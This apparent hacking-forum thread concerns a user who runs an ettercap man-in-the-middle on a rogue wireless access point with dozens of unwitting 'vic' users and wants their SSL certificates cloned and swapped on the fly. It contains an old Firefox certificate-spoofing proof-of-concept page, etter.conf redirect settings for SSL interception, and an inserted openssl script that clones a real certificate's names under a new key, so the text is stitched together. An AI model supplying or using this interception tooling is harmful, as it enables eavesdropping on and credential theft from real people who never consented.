Anybody know of a program/plugin that can copy a real SSL cert and inject a fake copy on the fly? Using ettercap as MITM on a rogue AP. Yeah, I know there will be a warning. Would be really cool to get this working with remote_browser.
All the best
onryo
Let me explain officer, I am not a hacker. I am a security tester of sorts!
ettercap does this with a self-signed cert. "real" would mean you have access to a trusted cert for the same domain.. ?
here you go
http://vimeo.com/3970303
I'm not 100% sure but I believe that SSLstrip may be able to do this.
What the rest said above is probably what you're after.
This was an old SSL exploit; it won't work now, but the theory might be good to look at.
Mozilla Firefox Certificate Spoofing
#########################################
Application: Mozilla Firefox
Vendors: http://www.mozilla.com
Version: 0.9.1 / 0.9.2
Platforms: Windows
Bug: Certificate Spoofing (Phishing)
Risk: High
Exploitation: Remote with browser
Date: 25 July 2004
Author: Emmanouel Kellinis
e-mail: me@cipher(dot)org(dot)uk
web: http://www.cipher.org.uk
List : BugTraq(SecurityFocus)/ Full-Disclosure
#########################################
=======
Product
=======
A popular Web browser, a good alternative to IE and
"the web browser" for Linux machines,
used to view pages on the World Wide Web.
===
Bug
===
Firefox has a caching problem, as a result of which someone can
spoof the certificate of any website and use it as his/her own.
The problem is exploited using onunload inside <body> and
redirection using the Http-equiv Refresh meta tag, document.write()
and document.close().
First you direct the redirection meta tag to the website
whose certificate you want to spoof, then inside
the <body> tag you add an onunload script so you can control
the output inside the webpage with the spoofed certificate.
After that you tell Firefox, as soon as you unload this page,
to close the stream; apparently the stream you close is
the redirection website's. You do that with
document.close().
Now you can write anything you want; you do that
using document.write(). After writing the content of your choice
you close the stream again. Usually Firefox won't display your content,
although if you check the source code you see it, so the last thing
is to refresh the new page (do that using window.location.reload()).
After that you have your domain name in the URL field, your content
in the browser and the magic yellow lock in the bottom left corner.
If you pass your mouse over it you will see displayed the name of
the website whose certificate you spoofed; if you double click on it you
will see full information about the certificate without any warning!
You don't need to have SSL on your website! It will work with
http.
Additionally, using this bug malicious websites can bypass content
filtering using SSL properties.
=====================
Proof Of Concept Code
=====================
<HTML>
<HEAD>
<TITLE>Spoofer</TITLE>
<META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com">
</HEAD>
<BODY
onunload="
document.close();
document.writeln('<body onload=document.close();break;><h3>It is Great to Use example\'s Cert!');
document.close();
window.location.reload();
">
</BODY>
</HTML>
=========================================================
*PK:http://www.cipher.org.uk/files/pgp/c...public.key.txt
=========================================================
Thx guys (never seen a chick hang out here).
I have had SSLstrip working in the past and even posted some mail that Moxie sent me here on the forums. In short, SSLstrip is really cool but MUCH too slow. I have also made dumps that I later decrypted after giving the "vic" a fake cert.
The thing is that I have like 30+ ppl hanging on a Karma-like airbase rogue AP. Got -P -C working etc. Since ettercap is doing all the ARP work I often hit the remote_browser plugin to see what is going on.
It would be really cool if there was a way to auto-copy all the issuer info on the cert and send a self-signed one. Yeah, the "vic" will get the browser warning from hell. In short, this is what I need:
1) auto-copies the info on the real cert, injects a fake self-signed one.
2) does this on the fly. No dumps.
All the best
onryo
Let me explain officer, I am not a hacker. I am a security tester of sorts!
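The certificate-copying half of item 1), as an added example that is not part of this thread and not an ettercap feature: a POSIX shell script that takes a captured server certificate and re-signs it under a fresh private key with openssl(1). `openssl x509 -signkey` copies the subject, serial and extensions (including subjectAltName) and sets the issuer to the subject, which is exactly "the real cert's info on a self-signed one". It assumes openssl 1.1.1 or later on the path; the make_demo_cert helper builds a constructed stand-in for a captured certificate so the script runs offline. The on-the-fly injection into the TCP stream is what ettercap's SSL dissector does and is not shown here.

```shell
#!/bin/sh
# clone_cert.sh: build a self-signed certificate that copies the Subject,
# serial and extensions (including subjectAltName) of a real server
# certificate under a fresh private key.
# Added example for this thread; not an ettercap feature. Assumes a
# reasonably current openssl(1) (1.1.1 or later).
# Usage: clone_cert.sh real_cert.pem new_key.pem cloned_cert.pem

clone_cert() {
    real=$1 key=$2 out=$3
    # `x509 -signkey` re-signs the input certificate: issuer := subject,
    # public key := the new key, validity reset. Everything else is copied.
    openssl genrsa -out "$key" 2048 2>/dev/null &&
    openssl x509 -in "$real" -signkey "$key" -days 365 -out "$out"
}

# Small readers; the "subject="/"issuer=" prefixes are stripped so the two
# can be compared directly.
cert_subject()     { openssl x509 -in "$1" -noout -subject | sed 's/^subject=//'; }
cert_issuer()      { openssl x509 -in "$1" -noout -issuer  | sed 's/^issuer=//'; }
cert_sans()        { openssl x509 -in "$1" -noout -ext subjectAltName; }
cert_fingerprint() { openssl x509 -in "$1" -noout -fingerprint -sha256; }

# Does certificate $1 chain to trust anchor $2? This is the check a browser
# performs before it shows the warning; the exit status is the answer.
chains_to() { openssl verify -CAfile "$2" "$1" >/dev/null 2>&1; }

# Constructed stand-in for a captured server certificate (a real one comes
# from `openssl s_client -connect host:443 -showcerts`), with a SAN list so
# the clone covers the same hostnames. Hostnames are assumptions.
make_demo_cert() {
    openssl req -x509 -newkey rsa:2048 -nodes -days 30 \
        -keyout "$1" -out "$2" \
        -subj "/C=US/O=Example Inc/CN=www.example.com" \
        -addext "subjectAltName=DNS:www.example.com,DNS:example.com" 2>/dev/null
}

if [ $# -eq 3 ]; then
    clone_cert "$1" "$2" "$3" || exit 1
    echo "cloned subject: $(cert_subject "$3")"
    echo "cloned issuer : $(cert_issuer "$3")"
fi
```

Verifying the clone against the real certificate fails while its names match the original field for field; that failed signature check, not the names, is what produces the browser warning, so nothing in this approach avoids it.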
Uhm, ettercap does exactly that with its SSL dissector...
EDIT: look into etter.conf and check that the redir command is set right:
redir_command_on
You have to provide a valid command (or script) to enable tcp redirection at kernel level in order to be able to use SSL dissection. Your script should be able to get 3 parameters:
%iface
The network interface on which the rule must be set
%port
The source port of the packets to be redirected (443 for HTTPS, 993 for imaps, etc).
%rport
The internally bound port to which ettercap listens for connections.
NOTE: this script is executed with an execve(), so you can't use pipes or output redirection as if you were in a shell. We suggest you to make a script if you need those commands.
redir_command_off
This script is used to remove the redirect rules applied by 'redir_command_on'. You should note that this script is called atexit() and thus it has not high privileges. You should provide a setuid program or set ec_uid to 0 in order to be sure that the script is executed successfully.
Wummi, are you sure that will copy the real cert? A few years back it just injected a premade cert and made a dump. The old way (if self-installed) was something like uncommenting 2 lines after filling in the needed port info etc. in the etter.conf? If this does copy the real cert I am going to shit egg rolls of joy!! Of course it will be self-signed. I just assumed it worked like before. I am on a Winho machine for the next few hours. Can't wait to try this out.
BTW, read your first posts. Love to see new ppl here have something to contribute. Thx and welcome.
All the best
onryo
Let me explain officer, I am not a hacker. I am a security tester of sorts!
Thx for the welcome! ettercap works how you need it.
Here's the real cert in Firefox 2:
hxxp://666kb.com/i/b9bb3mu6e1w97nnrw.jpg
Here's the one ettercap sends:
hxxp://666kb.com/i/b9bb3yitblc3cay3g.jpg
Sorry it's German, but you should understand enough.
PS: meh, can't post URLs for now...
EDIT: in BT4 you just need to uncomment the lines for iptables in etter.conf.